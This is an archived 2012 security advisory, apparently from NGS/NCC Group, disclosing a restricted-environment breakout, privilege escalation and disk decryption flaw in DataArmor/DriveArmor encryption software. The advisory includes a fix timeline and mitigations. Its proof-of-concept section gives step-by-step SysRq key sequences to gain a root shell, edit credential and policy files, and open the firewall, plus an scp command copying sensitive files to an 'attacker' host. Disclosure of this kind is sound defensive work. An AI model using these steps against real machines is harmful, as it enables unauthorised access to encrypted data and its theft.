what you don't know can hurt you

DataArmor / DriveArmor Privilege Escalation / Decryption

DataArmor / DriveArmor Privilege Escalation / Decryption
Posted Nov 30, 2012
Authored by Stuart Passe | Site ngssoftware.com

DataArmor and DriveArmor versions prior to 3.0.12.861 suffer from restricted environment breakout, privilege escalation, and full disk decryption vulnerabilities.

tags | exploit, vulnerability
MD5 | 0419d05b8467d22e94ea40d4bec34572

DataArmor / DriveArmor Privilege Escalation / Decryption

Change Mirror Download
=======
Summary
=======
Name: DataArmor Full Disk Encryption - Restricted Environment breakout, Privilege Escalation and Full Disk Decryption
Release Date: 30 November 2012
Reference: NGS00193
Discoverer: Stuart Passe <stuart.passe@ngssecure.com>
Vendor: Mobile Armor
Vendor Reference: KB #1060043
Systems Affected: All versions of DataArmor and DriveArmor prior to v3.0.12.861
Risk: Critical
Status: Published

========
TimeLine
========
Discovered: 10 January 2012
Released: 17 January 2012
Approved: 17 January 2012
Reported: 17 January 2012
Fixed: 23 January 2012
Published: 30 November 2012

===========
Description
===========
The Mobile Armor DataArmor Full Disk Encryption platform allows users to fully encrypt hard drives utilising centralised security policy management.

An issue exists whereby it is possible for unauthenticated users to break out from the restricted DataArmor environment, providing unrestricted administrative access to the underlying platform and associated configuration files.

This allows users to arbitrarily modify both the platform and associated configuration files. Authentication credentials can then be added and/or generated, providing the ability to escalate privileges and gain full access to data stored on the encrypted partition.

=================
Technical Details
=================
The DataArmor software appears to be running under a restricted Linux X11 environment, configured to grab all keystrokes so that special key combinations which might normally be accepted by a Linux Kernel (such as "reboot" [Ctrl+Alt+Del] or "switch TTY" [Ctrl+Alt+{F1-F12}]) are discarded and not acted upon by the underlying Operating System.

It is possible to bypass this keystroke grabbing (through use of the SysRq key), providing the ability to send special commands directly to the Linux Kernel and break-out from the DataArmor environment into the underlying Linux BusyBox Operating System. This subsequently exposes the running DataArmor environment to full manipulation by any user with physical access to the machine, with the possibility of recovering files or fully decrypting the hard disk by unauthorised users.

Technical Details (Proof of Concept)
====================================

Restricted Environment Breakout
-------------------------------
Note: The "SysRq" key is usually located near the "Print Screen" key. On some laptops "SysRq" is accessible only by pressing "Fn". In this case the combination is a bit trickier: hold "Alt", hold "Fn", hold "SysRq", release "Fn", press key.

1. Power on laptop and allow DataArmor software to present authentication screen
2. Send the SIGTERM signal to all processes except init (Alt+SysRq+e), which results in a blank screen being displayed
3. Switch to TTY2 (Ctrl+Alt+F2), which will display a cursor
4. Send the SIGKILL signal to all processes except init (Alt+SysRq+i), which will display the following prompt
5. Press "Return" to activate shell as root
6. Verify that shell is obtained
7. Open an additional TTY (Ctrl+Alt+F3) and press "Return"
8. Verify that the DataArmor "MAAuthenticate" software is not running (ps)
9. Switch back to TTY2 (Ctrl+Alt+F2)
10. Reinitialise the X11 environment (startx)
11. Allow the DataArmor software to fully load
12. Switch the keyboard from RAW mode to XLATE mode (Alt+SysRq+r) to disconnect keyboard from X11 keystroke grabbing
13. Switch back to the additional TTY3 (Ctrl+Alt+F3)
14. Check in the process list that DataArmor is fully running (ps)

At this stage, it is possible to manipulate the DataArmor environment into performing how we wish, allowing for potential full compromise of the laptop and encrypted data. We can view all current local users and hashes (cat /etc/Source/MAData.xml) for offline password-cracking as well as view and modify the local security policy (cat /etc/Source/PolicyFile.xml). This can however be taken a stage further. In addition to viewing the contents of these files, the DataArmor software re-reads the contents of the files when an authentication attempt is made, allowing a user to modify the files within the XFS /etc partition and have the software act accordingly (this can be useful for acts such as modifying the policy to prevent data erase and lockouts after failed password attempts, or change authentication method to local file containing hashes). The following can be performed after step 13 above, with the DataArmor software fully running.

Add User or Escalate Privileges
-------------------------------
Note: Whilst the privilege escalation vulnerability has been proven successfully within the test environment, the ability to successfully add users isn't fully tested at this stage due to uncertainties as to the
method of hash generation. This is purely a time restriction limitation due to short-term access to a DataArmor-enabled laptop, and could be successfully overcome with more time to complete reverse engineering efforts.

1. Navigate to the directory containing configuration files (cd /etc/Source)
2. Open the users file for editing (vi MAData.xml)
3. Add new user and associated hashes to file, making sure to write file (:wq)
4. Alternatively if credentials are known for a standard non-administrative user, edit the file and change the UserType to "1" to escalate privileges to an Administrator (<UserType>1</UserType>)
5. Return to the DataArmor screen running on TTY1 (Ctrl+Alt+F1)
6. Enter new/modified credentials into authentication box
7. Successful authentication presents the user with an additional option to access the Recovery Console (an administrative function)
8. This console gives the user free access to administrative functionality
9. This subsequently allows the user to recover sensitive files from the encrypted partition (such as Windows SAM files and user documents) and transfer them to external media such as a USB stick
10. Alternatively the user can fully decrypt the hard disk, at which point standard techniques for extracting data from the hard disk are applicable

Import/Export DataArmor Environment
-----------------------------------
Alongside fully compromising the running system through modification, the built-in networking capabilities within the Linux BusyBox Operating System mean that all platform files can potentially be moved from the local install to a secondary machine, or vice versa. This allows not only the possibility of extracting the sensitive files for analysis (and potentially cracking) offline in order to gain access to the laptop with existing user credentials, but the ability to transfer files back means that important libraries and executables may be modified on an attacker's machine and then uploaded to the "victim" laptop, potentially fully bypassing the encryption altogether or causing further malicious actions such as logging keystrokes and sending them via network to the attacker in order to capture valid credentials.

1. Switch the keyboard from RAW mode to XLATE mode (Alt+SysRq+r) to disconnect keyboard from X11 keystroke grabbing
2. Switch back to the additional TTY3 (Ctrl+Alt+F3)
3. Verify the currently running iptables ruleset (iptables -L)
4. Change the default rules from "DROP" to "ACCEPT" to allow full network access (vi /etc/iptables.conf)
5. Load modified iptables ruleset (iptables-restore < /etc/iptables.conf)
6. The presence of ssh and scp within the DataArmor environment allows for transferring files either from the victim (scp /etc/Source/sensitive_files attacker@192.168.0.1:/tmp/) or to the victim machine (scp attacker@192.168.0.1:/tmp/modified_files /etc/Source/)

===============
Fix Information
===============
An updated version of the software has been released to address these vulnerabilities:
http://esupport.trendmicro.com/solution/en-us/1060043.aspx


It is possible to change the configuration parameters whilst the kernel is running by either setting a sysctl parameter (kernel.sysrq = 0) or disabling directly through the /proc filesystem (echo "0" > /proc/sys/kernel/sysrq), however there is a short period of time where the kernel is still vulnerable during the booting process, before the contents of the configuration files are applied.

Due to this small window of vulnerability, the preferred option is to re-compile the Linux Kernel. The SysRq key combination is compiled in to most modern Linux Kernels by default, and to disable this fully, it must be explicitly specified during compilation of the Linux Kernel by modifying the required option (CONFIG_MAGIC_SYSRQ).

Additionally, consideration should be taken to strip down the Linux BusyBox environment in order to remove any potentially unnecessary functionality such as the shell and associated administrative tools (sh, bash, strace, ssh, scp, etc...).

Wikipedia "Magic SysRq Key" - http://en.wikipedia.org/wiki/Magic_SysRq_key
Linux Kernel Documentation - http://kernel.org/doc/Documentation/sysrq.txt
The Linux Documentation Project - http://tldp.org/HOWTO/Remote-Serial-Console-HOWTO/security-sysrq.html

NCC Group Research
http://www.nccgroup.com/research


For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    10 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close